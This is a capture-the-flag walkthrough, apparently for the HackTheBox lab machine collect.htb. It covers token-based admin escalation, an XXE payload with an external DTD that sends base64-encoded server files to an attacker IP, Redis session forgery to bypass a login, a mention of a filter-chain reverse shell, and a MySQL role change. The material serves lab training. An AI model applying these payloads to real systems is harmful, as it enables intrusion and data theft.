gitclonehttps://github.com/mrts/burp-suite-http-proxy-history-converter.gitcdburp-suite-http-proxy-history-converterpipinstall--requirement=requirements.txt# Will create a proxy_history.xml.html file pythonconvert-burp-suite-http-proxy-history-to-csv.py../proxy_history.xml
Checking the formatted logs we will discover a request that can be used to gain admin access
POST /set/role/admin HTTP/1.1Host:collect.htbUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language:pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding:gzip, deflateConnection:closeCookie:PHPSESSID=r8qne20hig1k3li6prgk91t33jUpgrade-Insecure-Requests:1Content-Type:application/x-www-form-urlencodedContent-Length:38token=ddac62a28254561001277727cb397baf
Exploitation
API XXE
Register an account on collect.htb and capture the requests in burp
Use the previously discovered token to elevate our privileges
POST /set/role/admin HTTP/1.1Host:collect.htbUser-Agent:Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language:en-US,en;q=0.5Accept-Encoding:gzip, deflateContent-Type:application/x-www-form-urlencodedContent-Length:38Origin:http://collect.htbConnection:closeReferer:http://collect.htb/loginCookie:PHPSESSID=b8gl9c885k7c52t61afnen4nj8Upgrade-Insecure-Requests:1token=ddac62a28254561001277727cb397baf
Open Collect - Admin in your browser, register a new API User and capture the request
POST /api HTTP/1.1Host:collect.htbUser-Agent:Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept:*/*Accept-Language:en-US,en;q=0.5Accept-Encoding:gzip, deflateContent-type:application/x-www-form-urlencodedContent-Length:171Origin:http://collect.htbConnection:closeReferer:http://collect.htb/adminCookie:PHPSESSID=b8gl9c885k7c52t61afnen4nj8manage_api=<?xml version="1.0" encoding="UTF-8"?><root><method>POST</method><uri>/auth/register</uri><user><username>mrk1</username><password>mrk1</password></user></root>
After some try and error we are able to read files . Check bootstrap.php to receive the redis password!
xxe.dtd
Do it for index.php to get an overview and than check bootstrap.php which is mentioned in index.php
While poking around we also discovered /var/www/developers/.htpasswd
<!ENTITY % file SYSTEM 'php://filter/convert.base64-encode/resource=../bootstrap.php'><!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'http://10.10.16.28/?file=%file;'>">%eval;%exfiltrate;
Burp Request
POST /api HTTP/1.1Host:collect.htbUser-Agent:Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept:*/*Accept-Language:en-US,en;q=0.5Accept-Encoding:gzip, deflateContent-type:application/x-www-form-urlencodedContent-Length:249Origin:http://collect.htbConnection:closeReferer:http://collect.htb/adminCookie:PHPSESSID=b8gl9c885k7c52t61afnen4nj8token:ddac62a28254561001277727cb397bafmanage_api=<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://10.10.16.28/xxe.dtd"> %xxe;]><root><method>POST</method><uri>/auth/register</uri><user><username>mrk1</username><password>mrk</password></user></root>
We'll use the basic auth creds to get a view of developers.collect.htb but there's nothing except a new login panel
Redis
We are now also able to access redis
redis-cli-hcollect.htbcollect.htb:6379> AUTHCOLLECTR3D1SPASSOKcollect.htb:6379> info# Keyspacedb0:keys=2,expires=2,avg_ttl=1137183collect.htb:6379> keys*# Our new session on developers.collect.htb1) "PHPREDIS_SESSION:q18lv56iqpr197npjbakrboird"# Our session on collect.htb3) "PHPREDIS_SESSION:b8gl9c885k7c52t61afnen4nj8"collect.htb:6379> getPHPREDIS_SESSION:q18lv56iqpr197npjbakrboird""collect.htb:6379> getPHPREDIS_SESSION:b8gl9c885k7c52t61afnen4nj8"username|s:4:\"mrk1\";role|s:5:\"admin\";"# Let's try to bypass developers.collect.htb login page# We'll use auth|s:1:\"a\";collect.htb:6379> setPHPREDIS_SESSION:q18lv56iqpr197npjbakrboird"username|s:4:\"mrk1\";role|s:5:\"admin\";auth|s:1:\"a\";"
developers.collect.htb 2
We have successfully bypassed the login page and can now see the developers section.
The parameter ?page is vulnerable to remote code execution using filter chains. We will use this project Filter Chain Generator to get an reverse shell on the system :)
/home/victor/pollution_api/controllers/Messages_send.js
While parsing through the source code we can spot a possible prototype pollution vulnerability
But checking the code will tell us that we need admin permissions on the api.
constMessage=require('../models/Message');const { decodejwt } =require('../functions/jwt');const_=require('lodash');const { exec } =require('child_process');constmessages_send=async(req,res)=>{consttoken=decodejwt(req.headers['x-access-token'])if(req.body.text){constmessage= { user_sent:token.user, title:"Message for admins", };_.merge(message,req.body);exec('/home/victor/pollution_api/log.sh log_message');Message.create({ text:JSON.stringify(message), user_sent:token.user });returnres.json({Status:"Ok"}); }returnres.json({Status:"Error", Message:"Parameter text not found"});}module.exports= { messages_send };
Getting API Admin Role
Using our discovered mysql credentials we are going to elevate the permissions of our api user that we created earlier
mysql-uwebapp_user-pMariaDB [(none)]> show databases;+--------------------+|Database|+--------------------+|developers||forum||information_schema||mysql||performance_schema||pollution_api||webapp|+--------------------+MariaDB [(none)]> use pollution_api;DatabasechangedMariaDB [pollution_api]> show tables;+-------------------------+|Tables_in_pollution_api|+-------------------------+|messages||users|+-------------------------+MariaDB [pollution_api]>select * from users-> ;+----+----------+----------+------+---------------------+---------------------+|id|username|password|role|createdAt|updatedAt|+----+----------+----------+------+---------------------+---------------------+|1|mrk1|xxxx|user|2022-12-1303:10:01|2022-12-1303:10:01||2|mrk2|xxxx|user|2022-12-1303:10:09|2022-12-1303:10:09||3|test|xxxx|user|2022-12-1303:28:25|2022-12-1303:28:25|+----+----------+----------+------+---------------------+---------------------+MariaDB [pollution_api]> update users set role='admin'whereid=1;QueryOK,1rowaffected (0.002 sec)Rowsmatched:1Changed:1Warnings:0